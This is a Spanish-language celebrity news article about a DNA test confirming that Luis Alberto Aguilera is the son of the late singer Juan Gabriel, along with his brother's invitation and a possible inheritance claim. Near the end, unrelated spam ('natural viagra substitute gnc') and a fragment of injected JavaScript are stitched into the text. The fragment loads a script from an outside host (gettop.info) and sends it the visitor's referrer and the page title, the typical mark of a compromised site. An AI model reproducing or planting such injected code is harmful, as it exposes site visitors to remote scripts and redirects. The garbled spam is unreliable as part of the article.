Luis Alberto Aguilera demuestra que es hijo biológico del artista Juan Gabriel y recibe una invitación de su hermano para conocerse

Comparte !

Una prueba de ADN dio como resultado que el cantante es su padre, lo que podría modificar los términos de la herencia

Los hijos de Juan Gabriel se iban a conocer por fin. Una reciente prueba de ADN demostró que Luis Alberto Aguilera, de 26 años y residente en Estados Unidos, es también hijo del fallecido artista mexicano como reclamaba.

Fue tras conocer estos datos cuando Iván Aguilera, heredero universal de la fortuna del cantante, envió una invitación a Luis Alberto para que pasara con su familia el día de Acción de Gracias, uno de los más importantes de esta época pre navideña en Estados Unidos. Sin embargo, el ansiado encuentro tendrá que esperar ya que Luis Alberto ha rechazado la invitación debido a que, según comenta en sus redes sociales, su madre y él tenían planes previos. “Nos es imposible asistir en esta ocasión, pero agradecemos de todo corazón la invitación que nos han extendido en una fecha tan significativa y esperamos poder reunirnos en cuanto sea posible” escribió.

“Como he expresado desde mi primera entrevista y también mi madre nuestros sentimientos son genuinos. Estoy y he estado siempre en la mayor disposición de que haya un acercamiento entre nosotros, para honrar el legado de nuestro padre, quien, además de ser un gran artista fue un gran ser humano” concluía el mensaje.

JGCF: Luis Alberto Aguilera

La cadena de televisión Univisión logró que el hermano de Juan Gabriel cediera una muestra de ADN para compararla con la de Luis Alberto. Tras el análisis los resultados dieron un 99,9% de coincidencia. “Yo ya sabía, pero para mí era importante dejar esto en claro. Para que no haya ninguna duda. A mí me gusta hablar con la verdad y que a la gente se le hable con la verdad” declaró Luis Alberto. Sobre la familia del cantante dijo: “Ojalá que aprendan de esta situación, para que en el futuro esto sirva en su vida, que a veces no es bueno juzgar o tomar una decisión sin estar bien informados”. De hecho en un mensaje en las redes sociales dirigido a su hermano, Iván Aguilera señalaba que tras la muerte de su padre se habían enterado de cosas que desconocían, refiriéndose a la existencia de Luis Alberto.

Luis Alberto Aguilera confirmó en una reciente entrevista que el abogado de su padre se había puesto en contacto con él, una situación que podría cambiar el proceso en que se encuentra el reparto de la  herencia, dado que tras demostrar que él también es hijo del mexicano podría tener derecho a parte de ella (si es reconocido de manera legal).

 

natural viagra substitute gnc Fuente: hola.com/

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares